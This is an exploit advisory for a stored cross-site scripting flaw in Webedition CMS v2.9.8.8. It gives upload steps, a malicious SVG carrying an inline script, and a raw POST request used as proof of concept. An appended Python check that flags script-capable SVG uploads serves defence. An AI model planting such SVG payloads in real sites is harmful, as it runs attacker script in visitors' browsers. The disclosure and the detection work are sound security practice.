Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
Date found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
====================================================
Steps
1. Log in to an account
2. Go to New -> Media -> Image
3. Upload a malicious SVG file
SVG file content:
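'''
<?xml version='1.0' standalone='no'?>
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
  <polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
  <!-- Inline script: runs in the site's origin when the stored file is opened in a browser -->
  <script type='text/javascript'>
    alert(document.location);
  </script>
</svg>
'''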
POC request:
POST /webedition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=
Host: localhost
Content-Length: 761
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webedition/we_cmd.php?
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; Wesession=E781790F1D79DDAF9E3A0A4E4EB42E55B04496A569; cookie=yep; treewidth_main=300
Connection: close

WE_TRANSACTION=73FEE01822CC1E1B9AE2D7974583BB8EEWE_CEA6F7E60CE62BE78E59F8498555D2038_FILENAME=m alaswe_cea6f7e60ce62BE78E59F849855D2038_EXTENSION=.SVGWETMP_WE_CEA_CEA6F7E60CE62BE78E59F8498555D20 38_extension=WE_CEA6F7E60CE62BE78E59F849855D2038_PARENTPATH=%2FWE_CEA6F7E60CE62BE78E59F849855 d2038_parentid=0yuiacconttypeparentpath=WE_CEA6F7E60CE62BE78E59F849855D2038_issearchable=1 check_we_cea6f7e60ce62be78e59f8498555d2038_issearchable=1We_cea6f7e60ce62be78e59f8498555d2038_i sprotected=0 fold%5b0%5D=0fold_Memed%5Bpropertypage_2%5D=0 fold%5B1%5D=0fold_named%5Bpropertypa ge_3%5D=0wetmp_cea6f7e60ce62be78e59f849855d2038_creatorid=%2FADMINWE_CEA6F7E60CE62BE78E59F849 855D2038_CREATORID=1WE_CEA6F7E60CE62BE78E59F849855D2038_RESTERTICTowners=0we_complete_request=1
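
A server-side screening check for the SVG upload path described above, as an added example that is not part of the original advisory or of webEdition's code. The function names and the sample inputs are constructed for illustration; the check flags script-capable content so an upload handler can reject the file before storing it.

```python
import xml.etree.ElementTree as ET

# Elements that can run script or embed foreign documents when an SVG is rendered.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "object", "embed"}
ANIMATION_ELEMENTS = {"animate", "set"}


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list:
    """Return the reasons an uploaded SVG should not be stored and served inline."""
    if b"<!ENTITY" in data:  # refuse entity declarations before parsing (expansion attacks)
        return ["entity declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            # Browsers ignore whitespace and control characters inside a URL scheme.
            url = "".join(c for c in value if c > " ").lower()
            if name.startswith("on"):
                findings.append(f"{name} handler on <{tag}>")
            elif name == "href" and url.startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
            elif tag in ANIMATION_ELEMENTS and name == "attributename" and "href" in value.lower():
                findings.append(f"<{tag}> animates href")
    return findings


# Constructed samples: the advisory's payload shape and a benign image.
POC_SVG = b"""<?xml version='1.0' standalone='no'?>
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
  <polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
  <script type='text/javascript'>alert(document.location);</script>
</svg>"""
BENIGN_SVG = b"<svg xmlns='http://www.w3.org/2000/svg'><rect width='5' height='5'/></svg>"

if __name__ == "__main__":
    for label, blob in (("poc", POC_SVG), ("benign", BENIGN_SVG)):
        print(label, svg_findings(blob) or "clean")
```

This is a reject-on-match screen, not a sanitizer. Serving stored uploads with `Content-Disposition: attachment` or a `Content-Security-Policy` that forbids script covers files the screen misses.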